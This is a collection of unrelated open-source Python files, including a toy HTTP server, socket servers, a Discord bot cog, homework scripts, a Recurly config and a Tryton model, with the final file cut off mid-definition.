+{"seq_id":"96403898","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom second_test4ICA import *\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nres=[]\nfor i in range(rank*Freq_num/6,(rank+1)*Freq_num/6):\n res.append(ICA.RESULT(i, N, pol, A_, S_, map1, map3))\n plt.close('all')\n\nif rank!=0:\n comm.send(res,dest=0)\nelif rank==0:\n a1=comm.recv(source=1)\n a2=comm.recv(source=2)\n a3=comm.recv(source=3)\n a4=comm.recv(source=4)\n a5=comm.recv(source=5)\n res=res+a1+a2+a3+a4+a5#+a6+a7\n res=np.array(res)\n\n f=np.linspace(700,800,Freq_num,endpoint=True)\n p=np.c_[f,res]\n np.savetxt('FG_128_freq200_times1',p)\n\n# plt.clf()\n# plt.plot(f,res)\n# plt.show()\n\n","sub_path":"compare_dynamic_range.py","file_name":"compare_dynamic_range.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"343899601","text":"from discord.ext import commands\nimport os, asyncio, discord\nfrom dotenv import load_dotenv\nload_dotenv()\nred = 0xF04747\ngreen = 0x43B581\norange = 0xFAA61A\n\nclass Poll(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def poll(self, ctx, *, question):\n embed = discord.Embed(color=green, title=f\":bar_chart: {question}\")\n msg = await ctx.send(embed=embed)\n await msg.add_reaction('🔼')\n await msg.add_reaction('🔽')\n\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(Poll(bot))\n","sub_path":"utils/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"494375331","text":"import socket\r\nimport os\r\nfrom datetime import date\r\nfrom datetime import datetime\r\n\r\n\r\nTCP_IP = '127.0.0.1'\r\nTCP_PORT = 8080\r\nBUFFER_SIZE = 1024 \r\n\r\nclass Server():\r\n def __init__(self):\r\n self.mimetypes = {\r\n \"css\" : \"text/css\",\r\n \"html\" : \"text/html\",\r\n \"ico\" : \"image/x-icon\",\r\n \"jpeg\" : \"image/jpeg\",\r\n \"png\" : \"image/png\"\r\n }\r\n\r\n def listen(self): #Creación del socket y bind a un numero de puerto\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((TCP_IP, TCP_PORT))\r\n s.listen(1)\r\n \r\n while 1:\r\n while 1:\r\n conn, addr = s.accept() #Se acepta la conexión entrante\r\n print(\"Connected to:\", addr)\r\n data = conn.recv(BUFFER_SIZE).decode()\r\n self.filter_request(data, conn)\r\n if not data: break\r\n conn.close()\r\n\r\n #Método que se encarga de determinar el tipo de HTTP request y llama al método correspondiente\r\n def filter_request(self, data, conn):\r\n string_list = data.split(' ') \r\n method = string_list[0]\r\n if method == \"GET\": \r\n print(\"\\t<<< GET >>>\")\r\n self.GET(string_list, data, conn)\r\n elif method == \"HEAD\":\r\n print(\"\\t<<< HEAD >>>\")\r\n self.HEAD(string_list, conn)\r\n elif method == \"POST\":\r\n print(\"\\t<<< POST >>>\")\r\n self.POST(data, conn)\r\n else:\r\n print(\"\\t<<< NOT IMPLEMENTED >>>\")\r\n self.NOT_IMPLEMENTED(conn)\r\n\r\n #Método para el manejo del error 501\r\n def NOT_IMPLEMENTED(self, conn):\r\n try:\r\n #Construcción y envío del header\r\n header = 'HTTP/1.1 501 Method Not Implemented\\n'\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nAllow: GET, POST, HEAD'+'\\n\\n'\r\n response = 'Error 501: File not implemented
Python HTTP Server
'.encode()\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n except:\r\n pass\r\n\r\n #Método para el manejo del error 501\r\n def NOT_ACCEPTABLE(self, conn):\r\n print(\"\\t<<< NOT ACCEPTABLE >>>\")\r\n try:\r\n #Construcción y envío del header\r\n header = 'HTTP/1.1 406 Not Acceptable\\r\\n'\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nAllow: GET, POST, HEAD'+'\\n\\n'\r\n response = 'Error 406: The request is not acceptable
Python HTTP Server
'.encode()\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n except:\r\n pass\r\n\r\n #Método que retorna el mimetype\r\n def get_mime(self, type_m, conn):\r\n file_type = self.mimetypes.get(type_m, \" \")\r\n return file_type\r\n\r\n #Método que se invoca cuando llega un HEAD al servidor\r\n def HEAD(self, string_list, conn):\r\n requesting_file = string_list[1]\r\n print('Client request ',requesting_file)\r\n myfile = requesting_file.split('?')[0]\r\n myfile = myfile.lstrip('/')\r\n if(myfile == ''):\r\n myfile = 'index.html'\r\n try:\r\n header = \"HTTP/1.1 200 OK\\r\\n\" #Construcción del header\r\n extension = myfile.split('.')\r\n file_type = self.get_mime(extension[len(extension)-1], conn)\r\n if(file_type == \" \"): #En caso que la solicitd no sea ningún archivo se depeliega un mensaje de error\r\n header = ' '\r\n self.NOT_ACCEPTABLE(conn)\r\n else:\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: '+file_type+'\\n\\n' #Se añaden elementos al header\r\n\r\n #self.write_log('HEAD',socket.gethostname(),'?', requesting_file.split('?')[0], ' ') #Llamado al método que escribe en la bitácora\r\n \r\n except Exception as e: #Mensaje de error desplegado al no encontrar el archivo solicitado\r\n header = \"HTTP/1.1 404 Not Found\\n\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n final_response = header\r\n conn.send(final_response.encode()) #Envía la respuesta \r\n\r\n #Método que se invoca cuando llega un GET al servidor\r\n def GET(self, string_list, data, conn):\r\n requesting_file = string_list[1] #Contiene el tipo de solicitud del cliente\r\n print('Client request ',requesting_file) \r\n myfile = requesting_file.split('?')[0] #Obtiene el nombre del archivo que se está solicitando\r\n values=' ' #Almacena los atributos junto con los valores del GET\r\n try:\r\n values = requesting_file.split('?')[1] #Se intentan tomar los valores que vienen en el GET en caso que hayan para guardarlos en bitácora\r\n except:\r\n pass\r\n myfile = myfile.lstrip('/')\r\n if(myfile == ''): #Si viene solo un / significa que se quiere el achivo por defecto index.html\r\n myfile = 'index.html'\r\n try:\r\n #Construcción del header de respuesta\r\n header = \"HTTP/1.1 200 OK\\r\\n\"\r\n extension = myfile.split('.')\r\n file_type = self.get_mime(extension[len(extension)-1], conn) #Invocación al método que permite obtener las extensión del archivo solicitado\r\n if(file_type == \" \"): #En caso que la solicitd no sea ningún archivo se depeliega un mensaje de error\r\n header = ' '\r\n response = ''.encode()\r\n self.NOT_ACCEPTABLE(conn)\r\n else:\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: '+file_type+'\\n\\n'\r\n \r\n #Apertura del archivo solicitado para posteriormente enviarlo como respuesta\r\n file = open(myfile,'rb') #Lectura en bytes\r\n response = file.read()\r\n file.close()\r\n \r\n #Invocación del método que escribe en la bitácora del servidor\r\n self.write_log('GET',socket.gethostname(),'?', requesting_file.split('?')[0], values)\r\n\r\n except Exception as e: \r\n #Construcción del header y la respuesta en caso que el archivo solicitado no exista\r\n header = \"HTTP/1.1 404 Not found\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n response = 'Error 404: File not found
Python HTTP Server
'.encode()\r\n \r\n #Se envía el header y luego la respuesta\r\n conn.send(header.encode())\r\n conn.send(response)\r\n\r\n #Método que se invoca cuando llega un POST al servidor\r\n def POST(self, data, conn):\r\n try:\r\n #Se contruye el header para su posterior envío al cliente\r\n header = \"HTTP/1.1 200 OK\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: text/html\\n\\n'\r\n\r\n values=data.split('\\r\\n') #Separación del contenido del header para obtener los valores del POST\r\n\r\n #Invocación del método que escribe en la bitácora del servidor\r\n self.write_log('POST',socket.gethostname(), socket.gethostname(), data.split(' ')[1], values[len(values)-1]) #values[len(values)-1] Contiene de los atributos con sus respectivos valores\r\n\r\n #Apertura del archivo solicitado para posteriormente enviarlo como respuesta\r\n f=open('post.html','rb') #Lectura en byte\r\n response=f.read(1024)\r\n f.close()\r\n\r\n except Exception as e:\r\n #Construcción del header y la respuesta en caso que el archivo solicitado no exista\r\n header = \"HTTP/1.1 404 Not found\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n response = 'Error 404: File not found
Python HTTP Server
'.encode()\r\n \r\n #Envío del header y la respuesta\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n \r\n \r\n # Método que documentar la bitácora de los HTTP requests que llegan al servidor\r\n def write_log(self, method, server_name, referer, url, data):\r\n logfile = open(\"log.txt\", \"a\")\r\n record = method + \"\\t\\t\\t\" + self.get_timestamp() + \"\\t\\t\\t\" + server_name + \"\\t\\t\\t\" + referer + \"\\t\\t\\t\" +url + \"\\t\\t\\t\" + data + \"\\n\"\r\n logfile.write(record)\r\n logfile.close()\r\n \r\n #Método que devuelve la marca de tiempo\r\n def get_timestamp(self):\r\n now = datetime.now()\r\n timestamp = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n return timestamp\r\n","sub_path":"mini_server.py","file_name":"mini_server.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636408596","text":"#!/usr/bin/env python\n\n# Script to run beyond compare which in turn backsup important folders\n\n__author__=\"Johann Romero\" # Based mostly on \"warrenstrange\" work @ https://blogs.oracle.com/warren/entry/a_python_script_to_encode\n__date__ =\"$Jun 19, 2013 11:28:09 AM$\"\n\nimport subprocess\nimport os.path\nfrom subprocess import Popen\nfrom hsendemail import sendmail\n\ndef bcbackup():\n '''\n Executes Beyond Compare\n '''\n \n strbc = os.path.join( \"f:\\\\\", \"Users\", \"johann\", \"bkpdaemon\", \"bcomp.exe\" )\n strbcconfig = os.path.join( \"f:\\\\\", \"Users\", \"johann\", \"bkpdaemon\", \"bkp.config\" ) \n \n #print (strbc)\n #print (strbcconfig)\n \n strcmd = strbc+' @'+strbcconfig\n #print (strcmd) \n\n if os.path.exists(strbc) and os.path.exists(strbcconfig):\n subprocess.call(strcmd, shell=True)\n print (\"i'm done, sending email...\")\n sendmail(\"BC Backup Done\",\"Backup has completed, pls check log files for any errors\")\n else: \n print (\"skipping this run... Either Beyond Compare is not installed or can't find the config file\")\n \nif __name__ == \"__main__\":\n bcbackup()","sub_path":"scripts/python/home.bcbackup.py","file_name":"home.bcbackup.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"592129546","text":"import sys\nsys.stdin = open(\"이진수2.txt\")\n\nT = int(input())\nfor tc in range(1, T+1):\n num = float(input())\n change = []\n check = 0\n while 1:\n if num == 0:\n break\n if len(change) >= 13:\n check = 1\n break\n num = num*2\n if num >= 1:\n change.append('1')\n num -= 1\n else:\n change.append('0')\n if check == 1:\n print('#{} overflow'.format(tc))\n else:\n print('#{} {}'.format(tc, ''.join(change)))\n","sub_path":"work/실습/+1. Start/이진수2.py","file_name":"이진수2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"131677682","text":"import socket\nimport base64\n\nhost = '192.168.0.177'\nport = 5050\naddress = (host, port)\n\nsocket01 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nsocket01.bind(address)\nsocket01.listen(1)\nprint('Socket Startup')\n\nconn, addr = socket01.accept() \nprint('Connected by', addr)\n\n##################################################\nprint('begin write image file')\ni = 0\nwhile True:\n imgName = \"socketImage%d.jpg\" %i\n print(imgName)\n imgFile = open(imgName, 'wb')\n Break = False\n while True:\n imgData = conn.recv(1024)\n print(type(imgData))\n imgFile.write(imgData)\n if not imgData:\n print(\"enter here\")\n Break = True\n break\n if imgData[-4:] == \"over\":\n break\n \n\n if Break:\n break\n\n imgFile.close()\n i += 1\n print('image save')\n##################################################\n\nconn.close()\nsocket01.close()\nprint('server close')","sub_path":"socketServer.py","file_name":"socketServer.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"235024480","text":"\"\"\"Measure the number of demos needed for ADA to find the optimal decomposition for Taxi.\"\"\"\n\nfrom imitation import Driver\n\nfrom ada import decompose\n\nTRIALS = 100 # Number of independent trials\nREPEATS = 16 # Decomposition attempts with each group of demos\nMAX_DEMOS = 32 # Demonstrations performed before giving up on a trial\n\nsuccesses = list()\n\nfor trial in range(1, TRIALS + 1):\n print(\"Trial\", trial, \"...\")\n \n driver = Driver()\n driver.train()\n\n num_demos = 0\n demos = dict()\n optimal = False\n\n while not optimal and num_demos < MAX_DEMOS:\n driver.generate(demos)\n num_demos += 1\n repeat = 0\n \n while not optimal and repeat < REPEATS:\n optimal = decompose(demos)\n repeat += 1\n\n if optimal:\n successes.append(num_demos)\n\nprint(\"Number of successes:\", len(successes), \"/\", TRIALS)\nprint(\"Demos before success:\", sorted(successes))\n","sub_path":"tasks/taxi/imitation/decompose.py","file_name":"decompose.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435670354","text":"#\n# ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py\n# \n# Created by Zhiyu Zhu on 2/17/16\n# Copyright © 2016 WWITDC. All rights reserved.\n#\n\nimport sys\n\narray = []\nfor i in range(1,6):\n print(i, end=\". \")\n array.append(sys.stdin.readline().replace('\\n',''))\n\ndef char_split(string, length, char):\n # divide string into substrings of length `length` and connect them with char\n length = int(length)\n tmp = []\n for i in range(0,int(len(string) / length)):\n start = i * length\n end = (i+1) * length\n tmp.append(string[start:end])\n if 0 < len(string) - end < length:\n tmp.append(string[end:len(string)])\n out = char.join(tmp)\n print('1. '+out)\n\ndef strrem(string, needToRemove):\n # remove all `needToRemove` in the string\n print('2. '+string.replace(needToRemove,''))\n\ndef strchr(string, stopSign):\n # return all characters in the string before the first `stopSign`\n print('3. '+string[0:string.index(stopSign)])\n\ndef strtok(string, seperateSign):\n # return string with a space before each `seperateSign`\n tmp = string.split(seperateSign)\n print('4. '+(' '+seperateSign).join(tmp))\n\ndef wordwrap(string, maxLength, seperateSign):\n # return string that it is seperated by space before each seperateSign, and each substring is not longer than `maxLength`\n tmp = string.split(seperateSign)\n if string[0] == seperateSign:\n tmp[0] = seperateSign + tmp[0] \n for index in range(1,len(tmp)):\n tmp[index] = seperateSign + tmp[index]\n out = []\n maxLength = int(maxLength)\n for subString in tmp:\n if len(subString) <= maxLength:\n out.append(subString)\n else:\n for i in range(0,int(len(subString) / maxLength)):\n start = i * maxLength\n end = (i+1) * maxLength\n out.append(subString[start:end])\n if 0 < len(subString) - end < maxLength:\n out.append(subString[end:len(subString)])\n print('5. '+(' '.join(out))) \n\ndata = array[0].split(',')\nchar_split(data[0],data[1],data[2])\ndata = array[1].split(',')\nstrrem(data[0],data[1])\ndata = array[2].split(',')\nstrchr(data[0],data[1])\ndata = array[3].split(',')\nstrtok(data[0],data[1])\ndata = array[4].split(',')\nwordwrap(data[0],data[1],data[2])\n","sub_path":"2015-2016/2/ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py","file_name":"ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"624989727","text":"# Name: Henry Rebbeck\n# CSE 140\n# Homework 2: DNA analysis\n\n# This program reads DNA sequencer output and computes statistics, such as\n# the GC content. Run it from the command line like this:\n# python dna_analysis.py myfile.fastq\n\n\n###########################################################################\n# Libraries\n###\n\n# The sys module supports reading files, command-line arguments, etc.\nimport sys\n\n\n###########################################################################\n# Read the nucleotides into a variable named seq\n###\n\n# You need to specify a file name\nif len(sys.argv) < 2:\n print(\"You must supply a file name as an argument\\\n when running this program.\")\n sys.exit(2)\n# The file name specified on the command line, as a string.\nfilename = sys.argv[1]\n# A file object from which data can be read.\ninputfile = open(filename)\n\n# All the nucleotides in the input file that have been read so far.\nseq = \"\"\n# The current line number (= the number of lines read so far).\nlinenum = 0\n\n\nfor line in inputfile:\n linenum = linenum + 1\n # if we are on the 2nd, 6th, 10th line...\n if linenum % 4 == 2:\n # Remove the newline characters from the end of the line\n line = line.rstrip()\n seq = seq + line\n\n\n########################################################################\n# Compute statistics\n###\n\n# Total nucleotides seen so far.\ntotal_count = 0\n# Number of G and C nucleotides seen so far.\ngc_count = 0\nat_count = 0\na_count = 0\nc_count = 0\ng_count = 0\nt_count = 0\nerr_count = 0\n\n\n# for each base pair in the string,\nfor bp in seq:\n # increment the total number of bps we've seen\n total_count = total_count + 1\n\n # next, if the bp is a G or a C,\n if bp == 'C' or bp == 'G':\n # increment the count of gc\n gc_count = gc_count + 1\n\n # next, if the bp is as A or a T,\n if bp == 'A' or bp == \"T\":\n at_count = at_count + 1\n if bp == 'G':\n g_count = g_count + 1\n if bp == 'C':\n c_count = c_count + 1\n if bp == 'A':\n a_count = a_count + 1\n if bp == 'T':\n t_count = t_count + 1\n '''\n if bp != 'A' and bp != 'C' and bp != 'G' and bp != 'T':\n err_count = err_count + 1\n print(\"Error at count\", a_count + c_count + g_count + t_count)\n print(\"BP = \", bp)\n '''\n\n# divide the gc_count by the total_count to find %\n# use the g,c,a,t count rather than total as there are\n# some errors in the total which should not be included\n\nsum_gcat = g_count + c_count + a_count + t_count\ngc_content = float(gc_count) / sum_gcat\n\n# divide the at count by the total_count to find %\nat_content = float(at_count) / sum_gcat\n\n# divide the indvidual count by the total_count to find %\ng_content = float(g_count) / total_count\nc_content = float(c_count) / total_count\na_content = float(a_count) / total_count\nt_content = float(t_count) / total_count\n\n\n# Print the answer\nprint('GC-content:', gc_content)\n# Print the answer\nprint('AT-content:', at_content)\n\n# Print the % of ecah nucleotide\n''' Not needed\nprint('G-content:', g_content)\nprint('C-content:', c_content)\nprint('A-content:', a_content)\nprint('T-content:', t_content)\n'''\n\n# Print the count of each nucleotide\nprint('G-Count:', g_count)\nprint('C-Count:', c_count)\nprint('A-Count:', a_count)\nprint('T-Count:', t_count)\n\n# print the sum of each letter\nsum_count = a_count + c_count + g_count + t_count\nprint('Sum of G,C,A,T count', sum_count)\n\n# Check to see if the total % nucleotide summs to 100%\n# sum_content = a_content + c_content + g_content + t_content\n# print('Sum of G, C, A and T:', sum_content)\nprint('Total count:', total_count)\nlength_of_seq = len(seq)\nprint('Length of sequence:', length_of_seq)\n\n# Print the AT/GC Ratio\nprint('AT/GC Ratio: ', (a_count + t_count) / (g_count + c_count))\n\n# print errors\n# print('Error count', err_count)\n\n# Classify the resulting GC content into high, medium low GC\nif gc_content > 0.6:\n print('GC Classification: high GC content')\nelif gc_content < 0.4:\n print('GC Classification: low GC content')\nelse:\n print('GC Classification: moderate GC content')\n","sub_path":"hw/hw08/dna_analysis.py","file_name":"dna_analysis.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"325205504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 25 23:41:53 2021\r\n\r\n@author: MrSan\r\n\"\"\"\r\n\r\nimport socket\r\nimport os\r\nfrom _thread import *\r\nimport struct\r\n\r\n\r\n#store target location\r\nclass target_list:\r\n def __init__(self):\r\n self.lat = bytearray(struct.pack(\"f\", 0.000))\r\n self.lon = bytearray(struct.pack(\"f\", 0.000))\r\n \r\n def setter(self, lat, lon):\r\n self.lat = lat\r\n self.lon = lon\r\n #self.lon = lon\r\n \r\n#-------------------------------create socket----------------------------------\r\nServerSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\nThreadCount = 0\r\ntry:\r\n ServerSocket.bind((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nprint('Waitiing for a Connection..')\r\nServerSocket.listen(5) #start listening to the port\r\n\r\nnew = target_list() #initialize target_list calls to store target cordinates\r\n\r\ndef threaded_client(connection): #serve client requests\r\n while True:\r\n Response = connection.recv(2) #recive client request 0 or 1\r\n req = int.from_bytes(Response, \"big\") #decode client request from byte to int\r\n print(req)\r\n if req == 0:\r\n connection.send(new.lat) #send latitude stored in class target_list class\r\n connection.send(new.lon) #send longitude stored in class target_list class\r\n \r\n if req == 1:\r\n lat = connection.recv(4) #recive latitude from client\r\n [x] = struct.unpack('f', lat) #decode from byte to float\r\n \r\n lon = connection.recv(4) #recive longitude from client\r\n [y] = struct.unpack('f', lon) #decode to float\r\n print(x)\r\n print(y)\r\n new.setter(lat , lon) #storre latitude and longitude in target_list class using setter function\r\n \r\n connection.close()\r\n\r\n#-------------------initiate new client connection-----------------------------------\r\nwhile True:\r\n Client, address = ServerSocket.accept() #connect to client\r\n print('Connected to: ' + address[0] + ':' + str(address[1])) #print client details\r\n start_new_thread(threaded_client, (Client, )) #create a thread for client\r\n ThreadCount += 1\r\n print('Thread Number: ' + str(ThreadCount))\r\nServerSocket.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"final review demo/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"457548809","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nimport recurly\n\n\n### Recurly API Settings ###\n\nAPI_KEY = getattr(settings, 'RECURLY_API_KEY', None)\nSUBDOMAIN = getattr(settings, 'RECURLY_SUBDOMAIN', None)\n\nJS_PRIVATE_KEY = getattr(settings, 'RECURLY_JS_PRIVATE_KEY', None)\nCA_CERTS_FILE = getattr(settings, 'RECURLY_CA_CERTS_FILE', None)\n\nDEFAULT_CURRENCY = getattr(settings, 'RECURLY_DEFAULT_CURRENCY', 'USD')\n\n# The username & password used to authorise Recurly's\n# postback notifications. In the format \"username:password\"\nHTTP_AUTHENTICATION = getattr(settings, 'RECURLY_HTTP_AUTHENTICATION', None)\n\n# You probably don't need to mess with these, but just in case.\nBASE_URI = getattr(settings, 'RECURLY_BASE_URI', None)\n\n\n### Django settings ###\n\n# For the love of all things holy, please keep this set to a sensible\n# (i.e. unchanging / non daylight saving) timezone. This determines the\n# timezone in which django_recurly stores dates in the DB, so if you\n# change this down the road then all your subscription dates will skew.\n# The sane thing to do here is to keep this as UTC and handle the\n# timezone conversion in your display logic.\nTIME_ZONE = getattr(settings, 'TIME_ZONE', 'UTC')\n\n### Django-Recurly settings ###\n\nRECURLY_ACCOUNT_CODE_TO_USER = getattr(settings, 'RECURLY_ACCOUNT_CODE_TO_USER',\n None)\n\n\n# Configure the Recurly client\nrecurly.API_KEY = API_KEY\n\nif JS_PRIVATE_KEY is not None:\n recurly.js.PRIVATE_KEY = JS_PRIVATE_KEY\n\nif CA_CERTS_FILE is not None:\n recurly.CA_CERTS_FILE = CA_CERTS_FILE\n\nif DEFAULT_CURRENCY is not None:\n recurly.DEFAULT_CURRENCY = DEFAULT_CURRENCY\n\nif BASE_URI is not None:\n recurly.BASE_URI = BASE_URI\n","sub_path":"django_recurly/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"48627233","text":"from pipes.pipe import Pipe\n# import keras\nfrom load_data import KEYS\nimport numpy as np\n\nSTRAIGHT_ONLY = True\n\nclass KerasPipe(Pipe):\n\n def __init__(self, filename, threshold=0.5, verbose=False):\n import keras\n self.model = keras.models.load_model(filename)\n self.threshold = threshold\n self.verbose = False\n\n def pipe(self, frame):\n if frame is None:\n return set()\n\n reshaped = frame.reshape((1, 1) + frame.shape)\n results = self.model.predict(reshaped)\n\n keys = set()\n if STRAIGHT_ONLY:\n clazz = np.argmax(results[0])\n keys.add(\"UP\")\n if clazz == 0:\n keys.add(\"LEFT\")\n if clazz == 1:\n keys.add(\"RIGHT\")\n else:\n for i in range(len(KEYS)):\n if results[0][i] > self.threshold:\n keys.add(KEYS[i])\n\n print(keys)\n\n if self.verbose:\n print(\"in shape: {}\".format(reshaped.shape))\n print(\"out shape: {}\".format(results.shape))\n print(\"out vals: {}\".format(results))\n print(\"out set: {}\".format(keys))\n return keys\n\n\n def __enter__(self):\n return self\n\n def __exit__(self, exit_type, value, traceback):\n pass\n","sub_path":"pipes/keras_pipe.py","file_name":"keras_pipe.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"592142302","text":"def asal_mi(x):\r\n i = 2\r\n if x ==1:\r\n return False\r\n elif x==2:\r\n return True\r\n else:\r\n while i 100000] = 0\n temp.append(np.nanmean(data))\n minmaxArray.append(temp)\n\nnp.savetxt('avgRainPerModel_reshaped.csv', minmaxArray, delimiter=',', fmt='%10.5f')","sub_path":"AvgRainPerModel.py","file_name":"AvgRainPerModel.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"52042642","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n # use DFS\n res = []\n self.DFS(res, s, 0, [])\n return res\n\n def DFS(self, res, s, index, path):\n if index == len(s):\n res.append(path)\n return\n for i in xrange(index, len(s)):\n if self.isPalin(s[index:i + 1]):\n self.DFS(res, s, i + 1, path + [s[index:i + 1]])\n return\n\n def isPalin(self, s):\n l, r = 0, len(s) - 1\n while l < r:\n if s[l] != s[r]:\n return False\n l += 1\n r -= 1\n return True","sub_path":"palindrome_partitioning/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"568049234","text":"from pymysql import cursors, connect\nfrom os.path import abspath, dirname, join\nimport configparser as cparser\nfrom pymysql.err import OperationalError\n\n#==============read db_config.ini==============\n\nbase_dir = dirname(dirname(abspath(__file__)))\nfile_path = join(base_dir, 'dev.ini')\nprint(file_path)\n\ncf = cparser.ConfigParser()\ncf.read(file_path)\n\nhost = cf.get('mysqlconf', 'host')\nport = cf.get('mysqlconf', 'port')\ndb = cf.get('mysqlconf', 'db_name')\nuser = cf.get('mysqlconf', 'user')\npassword = cf.get('mysqlconf', 'password')\n\n# ==================encapsulation SQL basic operation===========================\nclass DB:\n def __init__(self):\n try:\n self.connection = connect(host=host,\n port=int(port),\n user=user,\n password=password,\n db=db,\n charset='utf8mb4',\n cursorclass=cursors.DictCursor)\n except OperationalError as e:\n\n print('Mysql Error {}: {}'.format(e.args[0], e.args[1]))\n\n def clear(self, table_name):\n real_sql = \"DELETE FROM \" + table_name + \";\"\n with self.connection.cursor() as cursor:\n cursor.execute('SET FOREIGN_KEY_CHECKS=0;')\n cursor.execute(real_sql)\n print(real_sql)\n self.connection.commit()\n\n def insert(self, table_name, table_data):\n for key in table_data:\n table_data[key] = \"'\" + str(table_data[key]) + \"'\"\n\n key = ','.join(table_data.keys())\n print(key)\n value = ','.join(table_data.values())\n print(value)\n real_sql = 'INSERT INTO ' + table_name + \" (\" + key + \") VALUES (\" + value + \")\"\n print(real_sql)\n with self.connection.cursor() as cursor:\n cursor.execute(real_sql)\n self.connection.commit()\n\n def close(self):\n self.connection.close()\n\n\nif __name__ == '__main__':\n db = DB()\n table_name = 'sign_event'\n data = {'id': 12, 'name': 'hongmi', '`limit`': 2000, 'status': 1, 'address': 'Beijing exhibition center', 'start_time': '2019-08-20 00:25:42'}\n\n db.clear(table_name)\n # db.insert(table_name, data)\n db.close()\n\n","sub_path":"pyrequest/db_fixture/mysql_db.py","file_name":"mysql_db.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"357100817","text":"from trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pyson import Eval, Bool\nfrom trytond.model import Workflow\nfrom trytond.pool import Pool\nfrom trytond.transaction import Transaction\n\n\n_all_ = [\n 'Conveyance_Allowance',\n]\n\n\nclass Conveyance_Allowance(Workflow, ModelSQL, ModelView):\n \"\"\"Employee Conveyance Allowance\"\"\"\n\n __name__ = 'employee_conveyance.allowance'\n\n salary_code = fields.Char('Salary Code',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n employee = fields.Many2One('company.employee', 'Employee Name',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n designation = fields.Many2One('company.employee','Designation')\n department = fields.Many2One('company.employee','Department')\n transport_amount = fields.Float('Transport Amount',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n # vehicle = fields.Selection(\n # [\n # ('yes','Yes'),\n # ('no','No')\n # ], 'Do you have own vehicle')\n # transport = fields.Boolean('Transport') \n\n # vehicle_selection = fields.Selection(\n # [\n # ('motor_car', 'Motor Car'),\n # ('non_vehicle', 'Non Vehicle'),\n # ('scooter', 